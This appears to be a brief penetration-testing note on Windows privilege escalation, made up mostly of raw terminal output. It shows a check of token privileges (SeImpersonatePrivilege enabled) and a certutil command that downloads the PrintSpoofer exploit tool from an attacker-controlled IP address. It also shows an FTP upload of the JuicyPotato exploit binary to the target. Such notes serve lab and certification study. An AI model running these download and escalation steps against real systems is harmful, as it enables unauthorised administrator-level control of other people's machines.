Priv Esc
C:\wamp\www>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\ProgramData>certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
certutil.exe -urlcache -f http://192.168.45.239/PrintSpoofer32.exe printspoofer.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
ftp> put JuicyPotatox86.exe
local: JuicyPotatox86.exe remote: JuicyPotatox86.exe
229 Entering Extended Passive Mode (|||2053|)
150 File status okay; about to open data connection.
100% |*************************************************| 257 KiB 1.58 MiB/s 00:00 ETA
226 Closing data connection.
263680 bytes sent in 00:00 (1.06 MiB/s)



Last updated